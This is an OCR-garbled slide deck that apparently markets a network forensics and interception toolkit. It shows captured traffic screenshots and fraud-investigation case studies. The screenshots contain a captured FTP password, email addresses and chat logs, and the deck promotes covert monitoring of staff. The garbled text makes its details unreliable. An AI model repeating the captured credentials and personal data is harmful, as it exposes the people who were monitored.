P2P [8] Ш 6/15/20: ! 00:0е:а6: | | | | 

= TELNET 6/15/2009 3:24:46 PM 00:0e:a6:39:47:43 192.168.1.33 192.168 1.249 |192.168.1.249 DiagnosticCD ED2-1-10-2.iso | 15695696 
Telnet [1] | 6/15/2009 3:21:21 PM 00:0е:а6:38:47:43 192.168.1.33 |192.168.1.249 '192.168.1.249 DiagnosticCD ED2-1-10-2.iso 18187812 

= HTTP 6/15/2009 3:24:46 PM 00:0е:а6:39:47:43 |192.168.1.33 |192.168.1.249 '182.168.1.249 DiagnosticCD ED2-1-10-2.iso | 15695696 


HTTP Content [580] 


UTTO I Ж Бла таа 


Detail 


| Саршгећчире 2009/06/15 (Monday) 15:21 
User's IP Address: 192.168.1.33 
FTP Server's IP Address: 192.168.1 249 


FTP Login Password: 203154 


Detailed 
Information 


(nfo? call 866-830-6479) 
$1788.00 шәр com $2188.00 


name.com + Google 


Every domain name now comes 
Apps FREI 


=== Sample: File Transfer - P2P File _- 


iu Sharinc GE 


8» Network Forensics Analysis Toolkit 
File Edit View Case Management Tool Window Help 
№ _ eg = 
Е P2P P2P ях 
IRC Chatroom [1] 
E [ша 8 Captured Time Source MAC Source IP Destination IP Last Activated Time P2P Tool Transfered File 
Г] 18/10/2009 11:25:45 АМ _ 00:0а:е4:00:с0:98 | 192.168.1.190 0000 9/10/2009 11:26:14 АМ Ғоху 1.9.8.0 | Foxy.1.9.9. TC Setup[1] 
3 TELNET J 1 l 37 Al am 
Telnet [1] 19/10/2009 11:26:40 AM 00:0а:е4:00:с0:08 192.188.1.190 0.0.0. 19/10/2009 11:27:14 АМ Foxy 1.9.8.0 | Jay-Z, Rihanna, Kanye 
= HTTP 8/10/2009 11:26:58 AM |00:0а:е4:04:с0:98 | 192.168.1.190 0.0.0. 19/10/2009 11:26:58 AM BitTorrent Not Available 
Е ИЕ 10/30/2009 11:04:00 AM 100:0а:е4:00:с0:08 |192.168.1.190 0.0.0. 10/30/2009 11:04:00 АМ Foxy 1.9.8.0 Jay-Z ft. Rihanna & Ka 
› 10/30/2009 11:04:00 AM |00:ба:е4:ба:с0:48 |192.158.1.180 ; 


Source Destination Destination 
Port IP Port 


| | 

| 114.27 213.1 
[122.117.1624 
|11443.239.7 
|118.171.133.157 
122.127.178.98 


p 


11:26:07 АМ |0 
11:26:10 AM 0 


8219 
7587 
10369 
5939 
7759 
10583 
13935 


4407 
11390 
1383 


(524745 
33284 
1687104 


Captured Time: 2008 % 


PAP Peers ies 11447227190 Гнат олау | “Мы | боле || 


Transfered File: 38 524 реуопсе-Бдау-01-ѓеаї. Jay Z - Deja Vul {H 4853).mp3 = 
Bittorent «2 ©) é о 
А. ey 


Last Activated Time: 2009/09/10 (Thursday) 11:26 


P2P Tool: Foxy 1.9.8.0 


Sample: HTTP (Content) 


У Network Forensics Analysis Toolkit 


: File Edit View Case Management Tool Window Help 


= © Нер Content 
P2P [6] 


3-TELNET “у Captured Time Source MAC Source IP Destination IP Web Server's Host Charset Label of Web Page ^ 
Telnet [1] Ш 6/15/2009 3:31:16 PM (00:0А:Е4:00:С0:08 | 192.188.1.190 118.160.248.241 |wyahon.com = Yahoolz | 

= HTTP Г] 18/15/2009 3:31:17 PM 00:0А:Е4:00:С0:08 192.168.1.190 |124.108.103.241 | ad yieldmanager.com UNKNOWN 
НТТР Content [280] С 6/15/2008 3:31:24 PM |00:0А:Е4:00:С0:08 | 192.168.1.190 98.138 43.126 — |ca yahoo.com ‘UTF-8 Yahoo! Canada 
4. сыш. E ГІ |8/15/2009 3:31:33 РМ 00:0A:E4:0D:C0:D8 192.168.1190 68.180.150.139 canewsyahoo.com ОТЕ-8 Montreal cyclists bare 
Http Request [4310] Г] 56/15/2009 3:31:55 РМ 00:0А:Е4:00:С0:08 |192.168.1.190 68.180.150.139 — ca.news yahoo.com UTF-8 | Naked activists ride o 

=. Other У O |8/15/2008 3:32:31 PM 00:0А:Е4:00:С0:08 |192.168.1.190 68.180.150.139 — ca.news yahoo.com UTF-8 (Yahoo! Canada News 


а 


| Саршатт Tre. 2009/06/15 (Monday) Ят То rm atio n 


SourceCode 


User's IP Address: 192.168.1.190 
_ 


Web Server's IP Address: 119.160.246.241 


„=ч 
D r 

Web Server's Hos Web Server's Hostname: tw.yahoo.com 
UR http://tw.yahoo.com/ НЙ 


axonline.com з; 


Detail Whois |SourceCc 


<ІПОСТҮРЕ HTML PUBLIC /AW3C//DTD HTML 4.01//EN' ‘htto./iwww.w3 oroftr/htni4/strict.dtd'> 

‘shtml lang-"zh-tw'» 

E ource Code 
‘<meta http-equiv-" Content-Type" contentz"text/html, charset=utf-B"> 


«meta http-equiv="expires" contentz"- 1» «base href-http://tw.rd yahao.com/referurl/hp/1024/» 
|«title» Yahoo! tæ O</title> 

«script» 

Маг YAHOO-window.YAHOO]I(y; YAHOO namespace=function(_1){ if(!_1||!_1length}{return пи} var. 2- 1.split(".";; var. 32 YAHOO; for(var iz( 2[0]--"YAHOO")?1:0;i« 2 length; ++ 
= 3L 2; 3- 3[ 2} return 3; YAHOO. namespace("util"); YAHOO. namespace("widget"; YAHOO namespace("Fp"); YAHOO. namespace("TW.Fp'), 

var YTWFp = YAHOO. TW Ер; 

if( typeof Document)--'undefined' && typeof( HTMLDocumt idefined' && (document constructor)) (YAHOO Fp. sf = 1;}; 

IYAHOO.cookie- (get function(n){var v=",c=' «document.cool lexOf((' '+n+'=')):if(s>=0){s+=n.length+2;v=unescape(c.substring(s,c.indexOf(',',s)));}retumn v;},setfunction(n, 
la-arguments,al-a length; document. *!+y+((al>2&Ra[2]|=")?" expiresz"«(typeof(a[2])--"ohject'?a[2] toGMTString():(new Date(a[2]" 1000) toGMT String()) "")*" pathz"((al»: 
z")?a[3]"/"*";domainz"* ((al»4&&a[: hoo.com");}} 

маг ser-'http.//tw.yahoo.com/pamodule/spirit/; 


Whois 


name.com + Google 


Every domain name now comes 
with select Google Apps FREE! 


Google 


Sample: HTTP Upload/Download 


У Network Forensics Analysis Toolkit 


: File Edit View Case Management Tool Window Help 


P2P [В] 


T т. ІШ E Captured Time Source MAC Source IP Destination IP Web Server's Host Transfered File 
= HTTP 16/15/2009 4:32:47 РМ  |00:0E:A8:38:47:43 |192 168.1.33 |203.66.142.57 www wowtaiwan.com bw Launcher x«t 
HTTP Content [580] 6/15/2009 3:37:35 PM 00:0А:Е4:00:С0:08 192.168.1.190 217.20.127.141 www. mvystercrowley.com:80 Ejector_v1.0.zip 
HTTP Upload/Download 8/15/2008 3:37:41 PM 00:0A:E4:0D:C0:D8 |192.168.1.180 |217.20.127.141 — www. mystercrowley.com | Ejector_v1.0.zip 
ы ай 6/15/2009 3:38:27 PM  00:0А:Е4:00:С0:08 |192.168.1.190 208.109.138.6 www.citadel5.com gscalcB0.zip 
ee 5/15/2008 3:38:27 PM 00:0А:Е4:00:С0:08 192.168.1.190 208.109.138.6 www jos-develapment.com | gscalc60.zip 
6/15/2009 3:38:39 PM ;DA:EA: 0D: CO: .1B8.1. 88.191.80.94 www feedbackchat.com 


Detailed 
| muere suns) edn formation 


Source MAC:  00:0E:A6:38:47:43 


Source IP: 192.168.1.33 


Destination IP: 203.66.142.57 User's IP Address: 192.168.1.33 


Web Server's IP Address: 203.66.142.57 


Web Server's Но5 wan wowtaiwan.com.tw 


Web Server's Hostname: www wowtaiwan.co 


TYPE: Download 


Transfered File:  Launcher.txt who. IS 


Ferae 
$1788.00 иш 


пате.сот + Google 


Every domain name now comes 
with select Google Apps FREE! 


Sample: HTTP Video Streaming (FLV 


4} Network Forensics Analysis Toolkit 
: File Edit View Case Management Tool Window Help 


ы 


Http Video ях 


P2P [E] ^ 

n 7. 7 8 Captured Time Source MAC Source IP Destination IP Me REDE Transfered File T p 
2-НТТР [| (11/2/2009 9:21:50 AM |00:0E:A6:55:EC:C9 192.168.1.10 |pic.adver.com.tw |pic.adver.com.tw HTTPVIDEO <Хаааа flv 
HTTP Content [590] Г] 56/15/2009 3:50:36 PM 00:0А:Е4:00:С0:08 192.168.1.190 203.66.48.39 203.66.48.39 HTTPVIDEO KKbaaa Яу 
HTTP Upload/Download С 18/15/2009 3:53:43 PM 00:0A:E4:0D:C0:D8 192.168.1.190 203.68 48.45 203.66.48.45 |НТТРМОЕО 2xcaaa flv | 

м О (8/15/2009 3:53:45 PM 00:0А:Е4:00:С0:08 192.168.1.190 203.68.4845  203.88.48.45 HTTPVIDEO. kldaaa flv 

ius 16/15/2008 3:54:27 PM |00:0А:Е4:00:С0:08 | 192.168.1.180 | 203.66 48.40 203.66.48.40 |HTTPVIDEO C8daaa flv | 
:55: :DA EA: 0D: CO: 192.168.1.180 (203.66.48.45 203.66.48.45 HTTPVIDEO Uveaaa flv 


с 


User's IP Address: 192.168.1.33 


НЫ Web Server's IP Address: 203.68 142.57 [ Whois | | 
ТУРЕ: 4 Web Server's Hostname: www .wowtaiwan.com.bw Gstname Query | Whois | | 


Transfered File:  HTTPVIDEO sXaaaa flv 


үш ЭӉ Google 


Video BETA 


е ЧӘ 


wno.IS 


ne ERE Er 


(Info? сай: 866-830-6479) 
$1782.00 Мазай осо 


name.com + Google 


Every domain name now comes 
with select Google Apps FREE! 


Sample: HTTP Request 


У Network Forensics Analysis Toolkit 


: File Edit View Case Management Tool Window Help 


HTTP Content [580] 
HTTP Upload/Download 
Video Stream [B] 16/15/2009 4:31:41 РМ |00:0Е:АВ:39:47:43 |192.168.1.33 |203.66.142.57 | www.wowtaiwan.com tw 
Http Request [4310] 6/15/2009 4:31:42 PM 00:0Е:А6:39:47:43 |192.168.1.33 203.68.142.57 — www.wowtaiwan.com.tw 
=- Other 6/15/2009 4:31:52 PM 00:0Е:А6:39:47:43 |192.168.1.33 203.66.142.57 | www.wowtaiwan.com.tw 
cea 6/15/2009 2:47:56 PM 00:0А:Е4:00:С0:08 192.168.1.190 72.14.203.104 — |relay.google.com 
6/15/2009 3:31:15 PM 00:0А:Е4:00:С0:08 192.168.1.190 119.160.246.241 |tw yahoo.com 
6/15/2009 3:31:18 PM .00:0А:Е4:00:С0:08  192.168.1.190 124.108.103.241 ad yieldmanager.com 


Detailed 


Transfered Transfered F^ 


Source MAC Source IP Destination IP Web Server's Host 215 Extension 


User's IP Address: 192.168.1.33 


Web Server's Hostname: www .wowtaiwan.com tw 


who.IS 


<meta http-equi itz"text/html; charset-utf-B"» 
<meta http-equi @ = href-http:/ftw.rd.yahon.com/referurl/hp/1024/» 
«title» Yahoo! а 
<script> 
ar YAHOO-window.YAHOO]||f; YAHOO namespace=function(_1){ if(!_1||!_1 Jength}{return пи} var. 2- 1.split(*."; var __J=YAHOO; fd 
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== === == Http Request ^u POP3 | - x 
= BUR EE S _ _ _ 


= E-Mail р Datetime | Source IP Source MAC Destination IP Sender Receiver cc 
POPS [33] | 19/10/2009 11:11:58 AM | 182.168.1.190 00:0а:е4:04:с0:98 |220.130.119.240 decision їе... decision123... Hi, This is a... | 
IMAP [6] 9/10/2009 11:11:56 АМ 192.188.1.190 |00:Оа:е4:09:с0:98 (220.130.119.240 decision їе... decision123... Hi, This is a... 
VEHI 9/10/2009 11:11:56 AM 192.168.1.190 |00:0а:е4:09:с0:08 220.130.119.240 decision їе... decision123.. Hi, This is a... 
WebMail(Send) [47] 9/10/2009 11:11:58 AM 192.168.1.190 |00:0а:е4:09:с0:98 |220.130.119.240 decision їе... decision123... Hi, This is a... 
=. CHAT 9/10/2009 11:11:58 АМ 192.168.1.190 |00:0а:е4:09:с0:98 (220.130.119.240 decision_te... decision123... Hi, This is a... 
аа | ~ Du i Я Ерата Бы алы 1 
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Content VVhois Source Code 


Subject Hi, This is a test mail 38! 
Sender. decision test(àyam.com 
Receiver decision123@pchome.com.tw 
Datetime: 2009/09/10 (Thursday) 11:11 
Source MAC 00:0а:е4:00:с0:08 


Source IP 192.168.1.190 


Destination IP 220.130.119.240 


Free Text Search - Search by Key Words 


DECISION? 275 
us- G 


EB 


Cyber Crime Investigation 
and Some Case Studies 


Globalized Crime Issue 


Borderless Internet makes crime behavior more globalized. Through the 

Internet and cloud computing, communication in swindler group can be 

enhanced and anonymous. Because of limitation of state authority and 
anonymity, it is really hard for state prosecutors and police to take 
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Thailand 


Taiwan 
Swindlers 


North America 


South Korea 
China/HK 


Vietnam 


Cloud Computing = Network Computing 
Through Internet, computers can cooperate 


with each 


Challenges faced 


Hard to Find 
Foreign Proxy 


or Router as 
Jump Board 


@ By new technologies (like IP phones), it is 
hard to intercept their calls with existing 
equipment. We need professionals and 
suppliers to find the way out 


e Looking for cross border cooperation 
or other related clues if no cooperation 


@ VPN, Foreign Proxy as Jump Board for 
criminals may be hidden behind deeper in 
Internet 


Challenges faced 


Large Volume | 
12:21. €^Analyze data and find the key 
ПЕ 6 information by text mining and data 
Analysis _ warehousing 
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Missing | Tun 
| we must find how it is happening and analyze 
Partial Data а: 
ь 2 
bes ок @ Find source and links, and know the key 
vee point by technical assistance and help from 
Dummy 
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Gap between Physical and Cyber 


Physical Crimes 
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human [| apprehend arrest 
*others 


place [| warrant, confiscate 


Different sources dealt by 
police: hard to get clue (don't 
know how to do it), and no way 


eCrime side 
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[] web or tool gÁ | apprehend, 
| •поп- сш side Xp * p Useless П A xg 
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network || activities асап 
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Account [| 


Biggest Case: 
450 Nabbed in Largest 
Taiwan-China Fraud Bust 


О0000000 451 OUL 


450 Nabbed in Largest Taiwan-China 
Fraud Bust 


Æ Channel NewsAsia - 450 nabbed i 


e | htt = - Е 5 ле + v | Bina ” 
У, А http channelnewsasia.com/stories/afp asiapacific/view/1077084/1/.htm E х | >? Bing р 
File Edit View Favorites Tools Нер 
Favorites A Channel NewsAsia - 450 nabbed in largest Taiwa... ^ ” В ~ СЛ æ v Раде“ Safety» Tools e Y 


ASIA PACIFIC > 
Ноте 


SINGAPORE ASIA PACIFIC NEWS А- А+ 


WORLD 
ЕЕ 450 nabbed in largest Taiwan-China fraud bust 
SPORT = У 2010 1845 9 

TECHNOLOGY 


TAIPEI: About 450 people were arrested in Taiwan and China Wednesday in the largest 
joint anti-fraud operation launched by the two sides, the island's police said. 
ENTERTAINMENT 

More than 2,700 Chinese policemen and nearly 550 from Taiwan took part in coordinated 
raids against scam rings on both sides of the Taiwan Strait, said the Criminal Investigation 
Bureau in Taipei. 


HEALTH 


SPECIAL REPORTS 


Taiwan police arrested 121 suspects and confiscated more than 10 million Taiwan dollars 
900080 (312,500 US) while 329 were rounded up by Chinese authorities, according to the bureau. 


уоџепем5 "This is the largest-ever joint operation to show our determination to fight crime," the 
bureau said in a statement. 


7 Day News Archive Е 
Let this be а warning to criminal groups thinking they сап get away by moving back and 


ЕЕК forth across the Taiwan Strait." 1of1 [«[u]» 

According to the bureau, the suspects were accused of involvement in a variety of fraud 
schemes, including telephone and on-line auction scams, in which people paid money for 
goods they never received. 
In a different type of scam, they allegedly assumed fake identities such as prosecutors, 
judges or police officers, apparently to get people to reveal their bank account details. 

iPhone App | | 
Taiwan and China, which split in 1949 after a civil war, signed a joint crime-fighting and judicial assistance agreement last year amid 

B BlackBerry App improving ties. 
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http://www.channelnewsasia.com/stories/afp asiapacific/view/1077084/1/.html 
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450 Nabbed in Largest Taiwan-China 


Fraud Bust 


* The suspects were accused of involvement in 
a variety of fraud schemes, including 
telephone and on-line auction scams, in which 
people paid money for goods they never 
received. 


** [n a different type of scam, they allegedly 
assumed fake identities such as prosecutors, 
judges or police officers, apparently to get 
people to reveal their bank account details. 


* E-Detective systems are deployed in multiple 
locations in China and Taiwan to help the 
operation to track the suspects and preserve 


the evidences. 
http://www.channelnewsasia.com/stories/afp asiapacific/view/1077084/1/.html 


Decision Group Solutions 


Implementation 


Law Enforcement 


Agencies (MICT) 


engen joue Access to Central Management System, Reporting, — _ IDS/ 
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Distributed Tap 
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Systems 
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Using E-Detective to Track Suspects 


T асе ла ға. ст аи Y NS v¢ -7N | — 

ке 22 (8 (0 e "де Ее | Ы 
Q VOIP | № Delete | & Search | Upload Every Page| 20 
NO. [^ Date-Time Account Caller Callee Mode Type Codec File Name Time 
1. | ды a. 192.168.6.8 8610044407 8610000104 peer to peer SIP G723 VOIP_VXdHcR.wav 10 Sec 
2 ЈЕ ите 192.168.1.132 818610044420 1918610044421 реег їо реег SIP iLBC VOIP. i9d6zK.wav 58 Sec 
3. |Е] n 192.168.1.132 48610044420 88610044421 peer to peer SIP С729 VOIP HKr7PR.wav 50 Sec 
А. а Бр лая 192 1681.132 28610044420 VOIP DN1QFrwav 1 Min 3 Sec 
5. © E rd 192.168.1.132 88610044420 VOIP JKofpkwav 1 Міп 2 Ѕес 
и«1» 


otal 5 Total Page 1 Current Page 1 


Play back of reconstructed VOIP file 


E-Detective Other Reference Cases 


w.libertytimes.com.tw/2010/new/aug/12/today-centerl-2.htm 
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E-Detective Other Reference Cases 
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іт Favorites > Vietnam latest news - Thanh Nien Daily | Police а... fay я В ~ СЛ өш v Раде” Safetyy Toolsv @v 


foreign ase-terttta Last Updated: Tuesday, August 24, 2010 11:04:24 Vietnam (GMT 407) 


Police arrest 99 from Taiwan, China for fraud Latest news 
miscet (/3/2010 10:35 a Vietnam sets aside $153.9 min to train nuclear power 
8 Ministry of Security police have arrested — | 
| and charged 99 people from China and " Vietnamese culture to be part of South Korea 
Taiwan in an international phone and museum 


Internet fraud scam that has fleeced 


Storm to hit central Vietnam 
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Landslide buries seven in northern Vietnam 


The arrestees, 76 from Taiwan and 23 
from China, were placed in custody 
between June 29 and July 6, police said. 


House helpers get death, life sentence for murder 


On July 7, Major General Nguyen Duc Minh said Vietnam would extradite the 

arrestees because they have not turned up any Vietnamese victims. The 

international crew targeted Chinese banks and citizens, mostly in Jiangsu, Hanoi Millenium Annive rsay 
Anhui and Shanghai, he said. 


Police seized telecommunications equipment, computers and telephones. 
Major 


General To Lam told VOV News that the criminals often took over entire Gron. duon aaa DiE 
hotels of up to 30 to 40 rooms for their operations. € [d ИН ELSE IER M = 
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E-Detective Other Reference Cases 


3 


* Company staffs are caught sending out valuable 
confidential information to rivals. 

* Information sent out includes confidential price 
list, tender information and contact database. 

* Information sent through personal Email - Yahoo 
Mail, Gmail etc. and through IM - Yahoo Messenger, 
Windows Live Messenger etc... 

* E-Detective is use to monitor staffs online 
behaviors, retain and preserve all Internet 
communication and protect the company 
confidential info and intellectual property. 
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Sample IM - MSN Captured Content 


№. Г] 8 Date-Time Account User Handle Participants Conversation Count 
.07. 

1. 8 а frankie 3 frankiechan@hotmail.sg netsis@hotmail.sg +Conversation 11 

2 m e dee frankie 3$ пеуузһіһ һойтай сот natkit_perfect@hotmail.com 1Corlersation 12 


2010-07-20 
4-17-10  '92-168.1.12 3 


mea 1» Total 8 T 


tom_0102@hotmail.com newshih@hotmail.com +Corpersation 20 
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Я ов фило A-O- a = Би” ву“ Тез”, Ө- 
X Dote. Time, 2010-07-21 13.59.23 | мм Handie: Irankiechanfihotnailag Export | Every Page :[ 33 Соғет |! 
Но. Омо. Тее? User Handle Мозљаде Туре File Name File Size 
2010-07-21 
* ^52) frankiechanghhotmallag helo MSN 
2010-07-21 
2 135926 frankiechan@hounail.sg 1 aes Frankie MSN 
metsis@hoonail.sg hi Franioe Netsis here MSN 
netsisi&hotmail.sg how are you? MSN 
Wenklechangihotmeiag MHO.. на. fee here. hope MSN 


same 10 v 35 well 


D—— M — орап 
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Name: ММСАМ,0с01 а8 0011260601 а8с00050.ті20 frankiechanibhotmail.sg MSN no 
Туре: Unknown File Type, 113КБ 
From. 192.168.1.18 
— 07-21 14.01 35 5 9 1162K 
2010-07-21 14:01:57 ~ 2010- 
franklochan@hotmail.sg 0721 140222 MSN 198 8K 
~ Irankiechanghotmail.sg thanks Netsis. меу MSN 
Irankiechangbhotmail.sg. bye MSN 
| Е While files from the intemet can be useful. some files can potentially қ netsisiithotmail.sg bye MSN 
а ham your computer. E you do not trust the source. do not find a Total 11 Total Page 1 Current Page 1 
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